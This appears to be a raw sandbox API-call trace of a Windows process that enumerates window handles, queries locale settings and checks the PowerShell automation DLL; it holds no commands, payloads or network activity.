	[0820.767] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x16ac
	[0820.767] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1858
	[0820.767] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1664
	[0820.829] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x10b4
	[0820.829] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x10ac
	[0820.829] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x10ec
	[0820.829] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1068
	[0820.829] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x17e0
	[0820.829] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x102c
	[0820.830] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x17a4
	[0820.830] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1050
	[0820.830] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1694
	[0820.830] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1770
	[0820.830] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1720
	[0820.830] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x165c
	[0820.830] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1578
	[0820.830] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x16c0
	[0820.831] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x161c
	[0820.831] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1638
	[0820.831] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x15c8
	[0820.831] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1554
	[0820.831] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1674
	[0820.831] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1520
	[0820.831] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x14bc
	[0820.831] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xf8c
	[0820.831] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xe9c
	[0820.832] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1434
	[0820.832] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x14ec
	[0820.832] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xfcc
	[0820.832] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x12ac
	[0820.832] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1484
	[0820.832] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x934
	[0820.832] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xc0c
	[0820.832] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xb08
	[0820.833] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x948
	[0820.833] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1178
	[0820.833] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x13e0
	[0820.833] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xcd0
	[0820.833] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x13fc
	[0820.833] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xdc8
	[0820.833] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xc18
	[0820.833] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xc2c
	[0820.834] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xa1c
	[0820.834] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1244
	[0820.834] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xdb0
	[0820.834] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1398
	[0820.834] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1358
	[0820.835] GetWindow (hWnd=0x10566, uCmd=0x4) returned 0x0
	[0820.836] IsWindowVisible (hWnd=0x10566) returned 0
	[0820.836] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1370
	[0820.836] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1340
	[0820.836] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x130c
	[0820.836] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x12c0
	[0820.836] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x12e4
	[0820.836] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1270
	[0820.837] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1298
	[0820.837] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x120c
	[0820.837] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x122c
	[0820.837] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x11c4
	[0820.837] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x11b0
	[0820.837] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1188
	[0820.837] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1148
	[0820.837] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1160
	[0820.837] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x10fc
	[0820.838] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xe34
	[0820.838] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xea4
	[0820.838] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x514
	[0820.838] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xe48
	[0820.838] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xbc8
	[0820.838] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xdf8
	[0820.838] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x318
	[0820.838] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xcac
	[0820.839] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x8bc
	[0820.839] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xf9c
	[0820.839] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xf48
	[0820.839] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xe40
	[0820.839] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xecc
	[0820.839] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xeb8
	[0820.839] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xe80
	[0820.839] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xe98
	[0820.840] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xe60
	[0820.840] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xee4
	[0820.840] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xf00
	[0820.840] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xdf0
	[0820.840] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xe1c
	[0820.840] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xdd0
	[0820.840] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xd94
	[0820.840] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xd74
	[0820.840] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xd00
	[0820.841] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xcd8
	[0820.841] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xc84
	[0820.841] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xca4
	[0820.841] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xc64
	[0820.841] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xc24
	[0820.841] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xb84
	[0820.841] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xbac
	[0820.841] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x384
	[0820.842] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xab8
	[0820.842] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x33c
	[0820.842] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xa44
	[0820.842] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xa64
	[0820.842] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x8a8
	[0820.842] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xaf0
	[0820.842] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x88c
	[0820.842] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xb04
	[0820.843] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x910
	[0820.843] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x230
	[0820.843] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xac0
	[0820.843] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xab4
	[0820.843] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xaac
	[0820.843] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x3d0
	[0820.843] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x978
	[0820.843] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xa7c
	[0820.844] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x59c
	[0820.844] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xa88
	[0820.844] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xa6c
	[0820.844] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xa68
	[0820.844] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x9f8
	[0820.844] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xa04
	[0820.844] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x924
	[0820.844] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x8dc
	[0820.845] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x7dc
	[0820.845] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x768
	[0820.845] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x764
	[0820.845] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x820
	[0820.845] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x810
	[0820.845] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x794
	[0820.845] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x83c
	[0820.845] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x7ac
	[0820.845] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xb44
	[0820.846] GetWindowThreadProcessId (in: hWnd=0x108d6, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x6bc
	[0820.846] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xb5c
	[0820.846] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x838
	[0820.846] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x4d0
	[0820.846] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x4d0
	[0820.846] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x4d0
	[0820.846] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x4d0
	[0820.846] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x4d0
	[0820.847] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x4d0
	[0820.847] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x4d0
	[0820.847] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x4d0
	[0820.847] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x818
	[0820.847] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x5b8
	[0820.847] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x494
	[0820.847] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1ec
	[0820.847] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x440
	[0820.848] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x7e8
	[0820.848] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x730
	[0820.848] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x2c8
	[0820.848] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x31c
	[0820.848] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x330
	[0820.848] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x128
	[0820.848] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x5c8
	[0820.849] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x6f8
	[0820.849] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x358
	[0820.849] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x73c
	[0820.849] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xb0
	[0820.849] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x250
	[0820.849] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x240
	[0820.849] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x790
	[0820.849] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x61c
	[0820.850] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x540
	[0820.850] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x538
	[0820.850] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x568
	[0820.850] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x538
	[0820.850] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x568
	[0820.850] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x538
	[0820.850] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x540
	[0820.850] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x540
	[0820.851] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x57c
	[0820.851] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x460
	[0820.851] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x554
	[0820.851] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x4d0
	[0820.851] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x528
	[0825.328] WerSetFlags () returned 0x0
	[0825.337] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0825.338] CoTaskMemFree (pv=0x0) 
	[0825.339] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x16e008, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x16e000 | out: pulNumLanguages=0x16e008, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x16e000) returned 1
	[0825.339] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x16e008, pwszLanguagesBuffer=0x2e51a98, pcchLanguagesBuffer=0x16e000 | out: pulNumLanguages=0x16e008, pwszLanguagesBuffer=0x2e51a98, pcchLanguagesBuffer=0x16e000) returned 1
	[0825.347] CoTaskMemAlloc (cb=0x24) returned 0x328a40
	[0825.347] GetUserDefaultLocaleName (in: lpLocaleName=0x328a40, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0825.347] CoTaskMemFree (pv=0x328a40) 
	[0831.376] CoTaskMemAlloc (cb=0x104) returned 0x283a90
	[0831.376] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x283a90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0831.376] CoTaskMemFree (pv=0x283a90) 
	[0833.788] CoTaskMemAlloc (cb=0x104) returned 0x283a90
	[0833.788] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x283a90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0833.788] CoTaskMemFree (pv=0x283a90) 
	[0833.791] CoTaskMemAlloc (cb=0x104) returned 0x283a90
	[0833.791] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x283a90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0833.791] CoTaskMemFree (pv=0x283a90) 
	[0833.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0833.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16da70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0833.801] SetErrorMode (uMode=0x1) returned 0x1
	[0833.802] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x16dc80 | out: lpFileInformation=0x16dc80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0833.802] SetErrorMode (uMode=0x1) returned 0x1
